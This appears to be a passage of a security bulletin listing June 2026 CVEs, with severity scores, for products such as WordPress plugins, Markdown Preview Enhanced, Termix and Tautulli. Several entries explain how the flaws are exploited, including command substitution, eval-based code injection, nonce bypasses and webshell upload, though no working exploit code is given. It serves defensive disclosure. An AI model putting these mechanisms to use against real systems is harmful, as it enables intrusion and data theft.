| ShapedPlugin, LLC--Product Slider Pro for WooCommerce | Improper Validation of Specified Quantity in Input vulnerability in ShapedPlugin, LLC Product Slider Pro for WooCommerce allows Malicious Software Implanted. This issue affects Product Slider Pro for WooCommerce: from n/a before 3.5.3. No patched version is available - the vendor has applied a fix to an existing release without publishing a new version. While the patch provided by the vendor is valid, releasing it under the existing version number leaves users unable to reliably determine whether they are running a patched or vulnerable installation. As a result, we treat this as an unpatched version. | 2026-06-05 | 10 | CVE-2026-49777 |
| shd101wyy--Markdown Preview Enhanced | Markdown Preview Enhanced before 0.8.28 opens external files and links from the preview through a shell and does not validate untrusted inputs taken from the markdown document - the diagram filename attribute, imported file paths, and the latex_engine code-chunk attribute. On Windows, a crafted markdown document can inject operating system commands that execute when the document is previewed. Fixed in 0.8.28 by passing these inputs as literal arguments instead of through a shell and validating them before use. | 2026-06-05 | 8.8 | CVE-2026-49492 |
| shd101wyy--Markdown Preview Enhanced | Markdown Preview Enhanced before 0.8.28 parses Bitfield fenced code blocks with interpretJS(), which evaluates the block content as code via vm.runInNewContext(), allowing arbitrary code execution. A crafted markdown document containing a malicious bitfield code block executes attacker-controlled code on the server side when the document is rendered or exported. Fixed in 0.8.28 by parsing bitfield register definitions with JSON5.parse(), since they are purely data. | 2026-06-05 | 8.8 | CVE-2026-49493 |
| shd101wyy--Markdown Preview Enhanced | Markdown Preview Enhanced before 0.8.28 parses WaveDrom diagrams by evaluating untrusted markdown content with eval(), allowing arbitrary JavaScript execution. The flaw affects every render path - the live preview (window.eval) and presentation mode plus HTML export (the bundled WaveDrom.ProcessAll()/eva() helpers) - and can also be triggered through a <script type="WaveDrom"> element injected via raw HTML in markdown. When a victim previews or exports a crafted markdown document, an attacker can execute arbitrary code, leading to arbitrary file write. Fixed in 0.8.28 by parsing with JSON5.parse() and sanitizing WaveDrom data scripts to inert strict JSON. | 2026-06-05 | 8.8 | CVE-2026-50733 |
| shd101wyy--Markdown Preview Enhanced | Markdown Preview Enhanced 0.8.x with crossnote engine 0.9.28 contains a code injection vulnerability in the WaveDrom rendering pipeline that allows attackers to execute arbitrary JavaScript by embedding malicious content in a wavedrom fenced code block within a crafted Markdown document. Attackers can exploit the unsanitized passing of wavedrom block content to window.eval() in the VS Code webview context to abuse the extension's message passing and invoke arbitrary file writes on the local filesystem. | 2026-06-05 | 7.1 | CVE-2026-11422 |
| Shibby--Tomato | A flaw has been found in Shibby Tomato 1.28.0000. This affects the function start_dhcpc of the file /sbin/rc of the component Web UI. This manipulation causes os command injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. This project is superseded by FreshTomato. | 2026-06-04 | 7.2 | CVE-2026-10870 |
| Shibby--Tomato | A vulnerability has been found in Shibby Tomato 1.28.0000. This vulnerability affects the function start_6rd_tunnel of the file /sbin/rc of the component Web UI. Such manipulation of the argument ipv6_6rd_borderrelay leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This project is superseded by FreshTomato. | 2026-06-04 | 7.2 | CVE-2026-10871 |
| Shibby--Tomato | A vulnerability was found in Shibby Tomato 1.28.0000. This issue affects the function start_vpnserver of the file /sbin/rc of the component Web UI. Performing a manipulation results in os command injection. The attack can be initiated remotely. The exploit has been made public and could be used. This project is superseded by FreshTomato. | 2026-06-04 | 7.2 | CVE-2026-10872 |
| Shibby--Tomato | A vulnerability was determined in Shibby Tomato 1.28.0000. Impacted is the function rstats_path of the file /bin/rstats of the component Web UI. Executing a manipulation can lead to os command injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. This project is superseded by FreshTomato. | 2026-06-04 | 7.2 | CVE-2026-10873 |
| simcy_creative--PDF Signer | PDF Signer 3.0 contains a server-side template injection vulnerability that allows unauthenticated attackers to execute arbitrary code by injecting PHP commands through the CSRF-TOKEN cookie parameter. Attackers can craft malicious cookie values containing template injection payloads like shell_exec() to execute system commands and retrieve sensitive information from the server. | 2026-06-04 | 9.8 | CVE-2019-25729 |
| smartypants--SP Project & Document Manager | The SP Project & Document Manager plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the view_file function in all versions up to, and including, 4.71. This makes it possible for unauthenticated attackers to read file metadata and obtain download links for arbitrary files stored inside project folders on the server, which can contain sensitive information. The authorization gate uses a negated nonce check OR-chained with permission checks, meaning a missing or invalid nonce causes the entire condition to evaluate to true and bypass all preceding capability and ownership checks. The secondary fallback check only denies access for root-level files (pid == 0), leaving all files stored inside project folders fully exposed to unauthenticated users who supply only a valid file ID in a POST request to admin-ajax.php. | 2026-06-04 | 7.5 | CVE-2026-10737 |
| SMCI--AS-2115HS-TNR | A vulnerability exists in the SMTP service of the Supermicro BMC on the Supermicro AS-2115HS-TNR. An attacker who has obtained administrator privileges may inject specially crafted characters into the SMTP service configuration, which may cause the underlying system to execute unintended commands during process invocation. Potential impact includes denial of service, arbitrary code execution, or permanent compromise of the controller. | 2026-06-04 | 7.2 | CVE-2026-3820 |
| SolarWinds--Serv-U | SolarWinds Serv-U is susceptible to specially crafted, unauthenticated POST requests using Content-Encoding: deflate that crash the Serv-U service. Mitigation steps to secure customer environments are provided in the SolarWinds Trust Center for customers who are unable to deploy the update. | 2026-06-04 | 7.5 | CVE-2026-28318 |
| SolarWinds--Web Help Desk | SolarWinds Web Help Desk is found to be affected by a denial-of-service vulnerability, which when exploited, could cause the Web Help Desk server to crash due to insufficient memory. | 2026-06-02 | 8.2 | CVE-2026-28299 |
| SourceCodester--Computer Repair Shop Management System | A vulnerability was found in SourceCodester Computer Repair Shop Management System up to 1.0. Affected is an unknown function of the file /admin/products/manage_product.php. The manipulation of the argument ID results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used. | 2026-06-01 | 7.3 | CVE-2026-10263 |
| SourceCodester--Online Food Ordering System | A vulnerability was detected in SourceCodester Online Food Ordering System 2.0. Affected by this issue is the function include of the file /index.php. The manipulation of the argument page results in file inclusion. The attack can be launched remotely. The exploit is now public and may be used. | 2026-06-03 | 7.3 | CVE-2026-10694 |
| SourceCodester--Pizzafy E-Commerce System | A vulnerability was detected in SourceCodester Pizzafy E-Commerce System 1.0. Affected by this vulnerability is the function Login of the file /admin/admin_class_novo.php of the component Administrative Control Panel. The manipulation of the argument Username results in sql injection. The attack can be executed remotely. The exploit is now public and may be used. | 2026-06-03 | 7.3 | CVE-2026-10704 |
| SourceCodester--SEO Meta Tag Extractor | A vulnerability was determined in SourceCodester SEO Meta Tag Extractor 1.0. This vulnerability affects the function get_headers of the file /index.php. This manipulation of the argument url causes server-side request forgery. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2026-06-01 | 7.3 | CVE-2026-10287 |
| SourceCodester--Ship Ferry Ticket Reservation System | A security vulnerability has been detected in SourceCodester Ship Ferry Ticket Reservation System up to 1.0. This impacts an unknown function of the file /admin/login.php of the component Admin Login. Such manipulation of the argument Username leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2026-06-04 | 7.3 | CVE-2026-10877 |
| SourceCodester--Water Billing Management System | A vulnerability has been found in SourceCodester Water Billing Management System 1.0. This issue affects some unknown processing of the file /classes/Users.php?f=save of the component User Management Endpoint. Such manipulation leads to improper authorization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2026-06-01 | 7.3 | CVE-2026-10236 |
| Spacelabs Healthcare--Sentinel | Spacelabs Healthcare Sentinel versions 10.5.x and higher and 11.x.x before 11.6.0 contain an unauthenticated remote code execution vulnerability through a deprecated .NET Remoting HTTP channel exposed on port 8989 that allows attackers to perform arbitrary file read and write operations by supplying valid .NET URI endpoints. Attackers can write ASPX webshells to the IIS wwwroot directory to achieve unauthenticated remote code execution on the system. Port 8989 is not exposed in a default Sentinel installation; exploitation requires that the .NET Remoting port has been explicitly made network-accessible through deliberate configuration or network policy changes. | 2026-06-02 | 9.8 | CVE-2026-0611 |
| SQLite--sqldiff | SQLite 'sqldiff.exe' does not securely handle the way the Microsoft Windows C runtime converts Unicode characters to ANSI codepages. An attacker could use the '-L' option to load an arbitrary DLL with a crafted command line argument string that results in command line file arguments being misinterpreted as command line options. Fixed on or around 2025-12-26. | 2026-06-04 | 9.8 | CVE-2025-71316 |
| steipete--CodexBar | CodexBar prior to 0.32.0 contains a privilege escalation vulnerability in the CLI installer that allows local attackers to execute arbitrary commands as root by exploiting a race condition in temporary file handling. The installer creates a temporary file with mktemp, writes a privileged shell payload into it, and executes it with administrator privileges via bash, allowing a same-user local process to rewrite the installer body before the administrator prompt is approved, causing attacker-controlled commands to run as root. | 2026-06-01 | 7.1 | CVE-2026-49134 |
| steipete--CodexBar | CodexBar prior to 0.32.0 contains an insecure temporary file handling vulnerability that allows local attackers to access sensitive credentials or tamper with build artifacts by exploiting predictable file paths in the release notarization workflow. Attackers with access to the same host can read the App Store Connect API key written to a fixed path, pre-create files or symbolic links at predictable locations to redirect writes to attacker-controlled destinations, or tamper with notarization archives before submission. | 2026-06-01 | 7.1 | CVE-2026-49135 |
| SWivid--F5-TTS | F5-TTS through version 1.1.20 contains a path traversal vulnerability in the finetune Gradio handlers that allows unauthenticated attackers to write arbitrary files by passing unsanitized user-supplied project names directly to os.path.join() without validating the resulting path stays within the intended base directory. Attackers can supply absolute path arguments such as /tmp/EVIL to override the base directory entirely and create arbitrary directories with attacker-controlled JSON content at any filesystem path writable by the server process. | 2026-06-01 | 8.2 | CVE-2026-43624 |
| Synology--Synology Active Backup for Business Recovery Media Creator | An inclusion of functionality from untrusted control sphere vulnerability in OpenSSL configuration in Synology Active Backup for Business Recovery Media Creator before 2.5.0-2081 allows local users to execute arbitrary code via unspecified vectors. | 2026-06-03 | 7.8 | CVE-2022-49036 |
| Synology--Synology Hyper Backup Explorer | An inclusion of functionality from untrusted control sphere vulnerability in MinGW DLL component in Synology Hyper Backup Explorer before 3.0.1-0156 allows local users to execute arbitrary code via unspecified vectors. | 2026-06-03 | 7.8 | CVE-2022-49042 |
| Tautulli--Tautulli | Tautulli is a Python based monitoring and tracking tool for Plex Media Server. Versions prior to 2.17.1 expose a public `/image/<hash>` route that resolves attacker-controlled entries from `image_hash_lookup` and replays them through the same server-side image fetch logic used by authenticated image proxying. A low-privilege guest user can seed a malicious external image URL into this lookup table and then trigger server-side fetches through a fully unauthenticated endpoint. This turns an authenticated SSRF primitive into a persistent unauthenticated SSRF gadget. Once the malicious hash entry exists, any external user can request `/image/<hash>.png` and cause the PMS or Tautulli host to fetch an arbitrary attacker-chosen URL. Version 2.17.1 patches the issue. | 2026-06-04 | 9.9 | CVE-2026-43986 |
| Tautulli--Tautulli | Tautulli is a Python based monitoring and tracking tool for Plex Media Server. Versions prior to 2.17.1 expose `log_js_errors` to any authenticated user, including guest users when guest access is enabled. The endpoint writes attacker-controlled strings directly into the main application log. The administrator-only `logFile` view then reads that log file and embeds it into an HTML response without escaping. This creates a stored cross-site scripting condition where a low-privilege guest can inject HTML or JavaScript into the log file and have it execute in an administrator's browser when the log viewer is opened. Version 2.17.1 patches the issue. | 2026-06-04 | 8.9 | CVE-2026-43984 |
| Tautulli--Tautulli | Tautulli is a Python based monitoring and tracking tool for Plex Media Server. Versions prior to 2.17.1 expose `configUpdate` as a state-changing administrator endpoint, but the route does not enforce `POST` and does not use any anti-CSRF token. In the default form and JWT-based authentication mode, the administrator session cookie is issued with `SameSite=Lax`, which still permits top-level cross-site navigation requests. An attacker can exploit this by luring a logged-in administrator to a malicious page that submits a cross-site request to `/configUpdate` and overwrites the local administrator username and password. The attacker can then sign in directly with the chosen credentials and take over the Tautulli administrative interface. Version 2.17.1 patches the issue. | 2026-06-04 | 8.8 | CVE-2026-43985 |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.3.2, the GET /ssh/file_manager/ssh/resolvePath endpoint in Termix is vulnerable to OS command injection. The endpoint uses double-quote escaping for shell command construction, which does not prevent $(...) and backtick command substitution. Any authenticated user with an active File Manager SSH session can execute arbitrary commands on the connected remote host. Version 2.3.2 patches the issue. | 2026-06-05 | 9.9 | CVE-2026-45744 |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.3.2, the File Manager functionality in Termix contains a critical Broken Access Control vulnerability due to improper validation of the sessionId parameter. The backend trusts a client-controlled identifier without verifying that it belongs to the authenticated user. This allows an attacker to manipulate the value and access active File Manager sessions belonging to other users. Since these sessions are tied to SSH connections to remote VPS instances, exploitation allows unauthorized interaction with another user's remote filesystem. Because the File Manager exposes functionality such as file reading, writing, uploading, and execution, this vulnerability enables direct command execution on another user's VPS (RCE). Version 2.3.2 patches the issue. | 2026-06-05 | 9 | CVE-2026-45746 |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. The `POST /ssh/tunnel/connect` endpoint in Termix prior to version 2.3.2 builds an SSH tunnel command by interpolating user-controlled host record fields (`endpointIP`, `endpointUsername`, `password`) directly into a shell command without escaping, allowing persistent OS command injection on the source SSH host. Version 2.3.2 patches the issue. | 2026-06-05 | 9.8 | CVE-2026-45748 |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.3.2, the GET /ssh/file_manager/ssh/resolvePath endpoint in the Termix File Manager component unsafely processes the path parameter and embeds it into a shell command executed over the active SSH session. Because the user-controlled value is placed inside double quotes and only double quotes are escaped, shell command substitution syntax such as $(...) is still interpreted by the remote shell. Version 2.3.2 fixes the issue. | 2026-06-05 | 9 | CVE-2026-45750 |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. 16 file-manager endpoints in Termix prior to version 2.3.2 do not verify that the requesting user owns the SSH session identified by `sessionId`. An authenticated attacker who knows or guesses another user's active `sessionId` can read, write, delete, download, and execute files on the victim's connected SSH host. Version 2.3.2 patches the issue. | 2026-06-05 | 8.1 | CVE-2026-45743 |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Starting in version 1.7.0, Termix Desktop (Electron) disables TLS certificate validation, allowing a machine-in-the-middle attacker to intercept and modify HTTPS traffic to the configured Termix server. This can lead to credential theft and JWT/session theft during login and normal use. As of time of publication, no known patched versions are available. | 2026-06-05 | 8 | CVE-2026-45745 |
| Termix-SSH--Termix | Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. The `POST /users/totp/disable` and `POST /users/totp/backup-codes` endpoints in Termix prior to version 2.3.2 accept the account password as a sole authentication factor for MFA-critical operations. An attacker who obtains a user's password (phishing, credential stuffing, the passwordHash leak in GHSA-xxxx) can disable TOTP entirely or regenerate backup codes, without ever possessing the TOTP device or knowing a valid TOTP code. This renders two-factor authentication ineffective. Version 2.3.2 patches the issue. | 2026-06-05 | 8.1 | CVE-2026-45749 |
| Themefic--Hydra Booking | Missing Authorization vulnerability in Themefic Hydra Booking allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hydra Booking: from n/a through 1.1.41. | 2026-06-01 | 7.3 | CVE-2026-42675 |
| Themeisle--Masteriyo LMS PRO | Incorrect Privilege Assignment vulnerability in Themeisle Masteriyo LMS PRO allows Privilege Escalation. This issue affects Masteriyo LMS PRO: from n/a through 2.20.0. | 2026-06-02 | 9.8 | CVE-2025-53209 |
| Themerig--Listing Hub CMS | Listing Hub CMS 1.0 contains a SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the id parameter. Attackers can send GET requests to pages.php with crafted id values using error-based SQL injection techniques to extract database credentials, usernames, and version information. | 2026-06-04 | 8.2 | CVE-2019-25730 |
| themeum--Kirki Freeform Page Builder, Website Builder & Customizer | The Kirki - Freeform Page Builder, Website Builder & Customizer plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions 6.0.0 to 6.0.6. This is due to the plugin accepting an arbitrary email address when a username is used in the password reset request. This makes it possible for unauthenticated attackers to send a password reset link for any user registered on the site to their own email address. | 2026-06-02 | 9.8 | CVE-2026-8206 |
| ThimPress--LearnPress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThimPress LearnPress allows Reflected XSS. This issue affects LearnPress: from n/a through 4.3.6. | 2026-06-01 | 7.1 | CVE-2026-48865 |
| ThimPress--Thim Core | Missing Authorization vulnerability leading to code execution after installing malicious vulnerable plugin in ThimPress Thim Core. This issue affects Thim Core: from n/a through 2.3.3. | 2026-06-02 | 8.8 | CVE-2025-53345 |
| tittuvarghese--CollegeManagementSystem | A vulnerability was detected in tittuvarghese CollegeManagementSystem 3e476335cfbfb9a049e09f474c7ec885f69a9df3/a38852979f7e27ae67b610dce5979500ef8ebe01. This affects an unknown function of the file dashboard_page/forms/fetch.php. Performing a manipulation of the argument department_code results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. Continuous delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-05 | 7.3 | CVE-2026-11334 |
| Tomdever--wpForo Forum | Missing Authorization vulnerability in Tomdever wpForo Forum allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects wpForo Forum: from n/a through 3.0.6. | 2026-06-01 | 9.1 | CVE-2026-42682 |
| UnboundStudio--Accordion FAQ | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in UnboundStudio Accordion FAQ allows Reflected XSS. This issue affects Accordion FAQ: from n/a through 2.2.1. | 2026-06-02 | 7.1 | CVE-2025-52759 |
| UnboundStudio--Accordion FAQ | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in UnboundStudio Accordion FAQ allows PHP Local File Inclusion. This issue affects Accordion FAQ: from n/a through 2.2.1. | 2026-06-02 | 7.5 | CVE-2025-58024 |
| USCiLab--Cereal | A vulnerability was determined in USCiLab Cereal up to 1.3.2. Affected is an unknown function of the component Shared Pointer Handler. Executing a manipulation can lead to type confusion. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure. | 2026-06-07 | 7.3 | CVE-2026-11463 |
| UTT--HiPER 1200GW | A vulnerability was detected in UTT HiPER 1200GW up to 2.5.3-170306. This affects the function strcpy of the file /goform/formTaskEdit. The manipulation results in stack-based buffer overflow. The attack may be launched remotely. The exploit is now public and may be used. | 2026-06-01 | 8.8 | CVE-2026-10292 |
| UTT--HiPER 1200GW | A flaw has been found in UTT HiPER 1200GW up to 2.5.3-170306. This impacts the function strcpy of the file /goform/formFireWall. This manipulation of the argument Profile causes stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2026-06-01 | 8.8 | CVE-2026-10293 |
| VeronaLabs--WP Statistics | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs WP Statistics allows DOM-Based XSS. This issue affects WP Statistics: from n/a through 14.16.6. | 2026-06-01 | 7.1 | CVE-2026-48839 |
| vertex-app--vertex | Vertex is a management tool for PT (Private Tracker) users to manage streaming and watching videos. Versions prior to commit fbde301b97986d5913fc4bc95f5445750d282e11 are vulnerable to path traversal. Users should upgrade to a version containing commit fbde301b97986d5913fc4bc95f5445750d282e11 to receive a patch. | 2026-06-01 | 8.6 | CVE-2024-40646 |
| Wasiliy Strecker / ContestGallery developer--Contest Gallery Pro | Incorrect Privilege Assignment vulnerability in Wasiliy Strecker / ContestGallery developer Contest Gallery Pro allows Privilege Escalation. This issue affects Contest Gallery Pro: from n/a through 29.0.1. | 2026-06-01 | 9.8 | CVE-2026-42680 |
| webfactory--Advanced Google reCAPTCHA | The WP Captcha PRO (the premium version of the Advanced Google reCAPTCHA plugin, both have the same slug) plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 5.38. This is due to a capability check in the save_ajax() function of the licensing module, combined with unrestricted file extraction in sync_cloud_protection(). This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files including PHP webshells to the server by injecting a malicious cloud_protection_url into the license meta, which the plugin then downloads and extracts without file type validation into a web-accessible uploads directory. This can be used for remote code execution. Note: The vulnerability can only be exploited with a remote URL if "allow_url_fopen" is enabled in the php.ini config. | 2026-06-05 | 8.8 | CVE-2026-5411 |
| webfactory--Advanced Google reCAPTCHA | The WP Captcha PRO (the premium version of the Advanced Google reCAPTCHA plugin, both have the same slug) plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 5.38. This is due to the ajax_run_tool() AJAX handler relying solely on a nonce check (check_ajax_referer) for security without performing any capability check, combined with the create_temporary_link tool allowing the generation of passwordless login links for arbitrary users, and the handle_temporary_links() function authenticating visitors via these links without any additional authorization validation. The required nonce is exposed to all authenticated backend users (including Subscribers) via wp_localize_script() on all non-settings admin pages when the plugin's welcome pointer has not been dismissed. This makes it possible for authenticated attackers, with Subscriber-level access and above, to bypass normal authentication and log in as any user, including Administrators, resulting in complete account takeover. | 2026-06-05 | 8.8 | CVE-2026-5415 |
| Wp Directory Kit--WP Directory Kit | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Wp Directory Kit WP Directory Kit allows Blind SQL Injection. This issue affects WP Directory Kit: from n/a through 1.5.1. | 2026-06-01 | 9.3 | CVE-2026-42672 |
| WP Swings--Wallet System for WooCommerce | Authentication Bypass Using an Alternate Path or Channel vulnerability in WP Swings Wallet System for WooCommerce allows Password Recovery Exploitation. This issue affects Wallet System for WooCommerce: from n/a through 2.7.5. | 2026-06-02 | 7.1 | CVE-2026-42654 |
| wpdevteam--Gutenberg Essential Blocks Page Builder for Gutenberg Blocks & Patterns | The Gutenberg Essential Blocks - Page Builder for Gutenberg Blocks & Patterns plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.1.3 via the `save_ai_generated_image()` function. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2026-06-04 | 7.2 | CVE-2026-10586 |
| wpusermanager--WP User Manager User Profile Builder & Membership | The WP User Manager - User Profile Builder & Membership plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.9.17 via the (profile template scope) function. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included. | 2026-06-05 | 7.5 | CVE-2026-9290 |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. Prior to version 3.12.0, ui.restructured_text() renders reStructuredText server-side with Docutils without disabling file insertion directives. When a NiceGUI application passes attacker-controlled content to ui.restructured_text(), an attacker can use standard Docutils directives (include, csv-table with :file:, raw with :file:) to read local files readable by the NiceGUI server process. Applications that only pass trusted static strings to ui.restructured_text() are not affected. This issue has been patched in version 3.12.0. | 2026-06-02 | 7.5 | CVE-2026-45553 |
| zhayujie--chatgpt-on-wechat | A weakness has been identified in zhayujie chatgpt-on-wechat up to 2.0.8. This issue affects the function _get_safety_warning of the file agent/tools/bash/bash.py of the component Bash Tool. Executing a manipulation can lead to os command injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. Upgrading to version 2.0.9 is capable of addressing this issue. This patch is called 16d9b449c9aa53ccee44144a762a2737d7ba4fc4. It is recommended to upgrade the affected component. | 2026-06-01 | 7.3 | CVE-2026-10214 |
| Zuz--Zuz Music | Zuz Music 2.1 contains a persistent cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious JavaScript by submitting crafted contact form data. Attackers can inject script code through the name, subject, and message parameters in POST requests to /gmusic/zuzconsole/___contact, which executes when administrators view messages in the inbox interface. | 2026-06-04 | 7.2 | CVE-2019-25731 |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| 10web--Photo Gallery by 10Web Mobile-Friendly Image Gallery | The Photo Gallery by 10Web - Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to time-based SQL Injection via 'compact_album_order_by' Shortcode Parameter in all versions up to, and including, 1.8.41 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The malicious payload is stored via the 'shortcode_bwg' AJAX handler - accessible to Contributor-level users and exploitable without a valid nonce by omitting the 'page' parameter - and is subsequently triggered by the unauthenticated 'bwg_frontend_data' AJAX handler, meaning successful exploitation requires only that an attacker has Contributor-level access to save the shortcode. | 2026-06-06 | 6.5 | CVE-2026-9829 |
| a4m4--Student-Management-System | A flaw has been found in a4m4 Student-Management-System up to f0c5f6842c5e8c431ff02b5260a565ca844df3a0. The affected element is an unknown function of the file admin/ of the component Admin Endpoint. This manipulation of the argument uid causes execution after redirect. It is possible to initiate the attack remotely. The exploit has been published and may be used. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. Multiple endpoints are affected. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 6.3 | CVE-2026-10271 |
| a4m4--Student-Management-System | A vulnerability has been found in a4m4 Student-Management-System up to f0c5f6842c5e8c431ff02b5260a565ca844df3a0. The impacted element is an unknown function of the file admin/deleteform.php. Such manipulation of the argument sid leads to improper authorization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continuous delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 6.5 | CVE-2026-10272 |
| absikandar--Frontend User Notes | The Frontend User Notes plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1.1. This is due to missing or incorrect nonce validation on the funp_ajax_modify_notes function. This makes it possible for unauthenticated attackers to trick a logged-in user into visiting a malicious page, causing unauthorized overwriting of that victim's own note content via a forged cross-site request to wp_update_post(), granted they can trick the victim into performing an action such as clicking on a link. Due to ownership enforcement comparing the note's stored _funp_single_user_id meta against the current session's user ID, the attack is limited to modifying only notes belonging to the tricked victim, and cannot be used to alter notes owned by arbitrary third-party users. | 2026-06-05 | 4.3 | CVE-2026-7047 |
| ahujasid--blender-mcp | A vulnerability was found in ahujasid blender-mcp up to 7636d13bded82eca58eb93c3f4cd8708dfdfbe8b. The affected element is the function requests.get of the file src/blender_mcp/server.py of the component ZIP File Handler. The manipulation of the argument zip_file_url results in server-side request forgery. The attack can be executed remotely. The exploit has been made public and could be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The patch is identified as 5b37be25242e73dc4cf1328974d30458b9e5d67e. It is advisable to implement a patch to correct this issue. | 2026-06-02 | 6.3 | CVE-2026-10662 |
| ahujasid--blender-mcp | A vulnerability was determined in ahujasid blender-mcp up to 7636d13bded82eca58eb93c3f4cd8708dfdfbe8b. The impacted element is the function execute_blender_code of the file /src/blender_mcp/server.py. This manipulation of the argument code causes code injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. This product adopts a rolling release strategy to maintain continuous delivery. Therefore, version details for affected or updated releases cannot be specified. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-02 | 5.5 | CVE-2026-10688 |
| ahujasid--blender-mcp | A vulnerability has been found in ahujasid blender-mcp up to 7636d13bded82eca58eb93c3f4cd8708dfdfbe8b. Impacted is the function Open of the file src/blender_mcp/server.py. The manipulation of the argument input_image_url leads to injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The identifier of the patch is 5b37be25242e73dc4cf1328974d30458b9e5d67e. To fix this issue, it is recommended to deploy a patch. | 2026-06-02 | 4.3 | CVE-2026-10661 |
| aio-libs--aiohttp | AIOHTTP is an asynchronous HTTP client/server framework for asyncio and Python. Prior to version 3.14.0, using ``CookieJar.load()`` with untrusted input may allow arbitrary code execution. Most applications using this function will be doing so with the user's own data, so this is unlikely to affect many applications. Version 3.14.0 patches the issue. If an application does allow attacker controlled files to be loaded, a workaround on older releases would be to sanitize the files before loading. | 2026-06-02 | 6.4 | CVE-2026-34993 |
| alejo30--Alba Board | The Alba Board plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.1.3. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to access arbitrary private alba_card post data, including title, description, assignee, due date, tags, and comments, that is intended to be restricted to Administrators and Editors. The handler is registered via the wp_ajax_nopriv_ hook and its nonce is exposed to all site visitors through wp_localize_script on pages containing the [alba_board] shortcode, making this exploitable by unauthenticated users who can access any such page. | 2026-06-05 | 4.3 | CVE-2026-7523 |
| alfio-event--alf.io | alf.io is an open source ticket reservation system for conferences, trade shows, workshops, and meetups. Prior to version 2.0-M5-2606, the alf.io extension sandbox injects a fully-functional HTTP client (`simpleHttpClient`) into every extension script's scope. The `postFileAndSaveResponse()` method accepts an arbitrary filesystem path as its `file` parameter and reads the file contents using `new FileInputStream(file)` with no path validation, directory restriction, or allowlist. A malicious extension script can read any file accessible to the JVM process user and exfiltrate it to an attacker-controlled server via HTTP POST. Version 2.0-M5-2606 patches the issue. | 2026-06-02 | 4.9 | CVE-2026-41412 |
| Anton Shevchuk--Constructor | Missing Authorization vulnerability in Anton Shevchuk Constructor allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Constructor: from n/a through 1.6.5. | 2026-06-02 | 5.3 | CVE-2025-53302 |
| Appsmith--Appsmith | Appsmith's SQL query editor's autocomplete functionality fails to sanitize database object names before rendering them in innerHTML, allowing an authenticated Developer to inject persistent XSS via malicious table or column names, triggering arbitrary code execution in the sessions of other workspace members when they interact with the same datasource. | 2026-06-02 | 6.3 | CVE-2026-7299 |
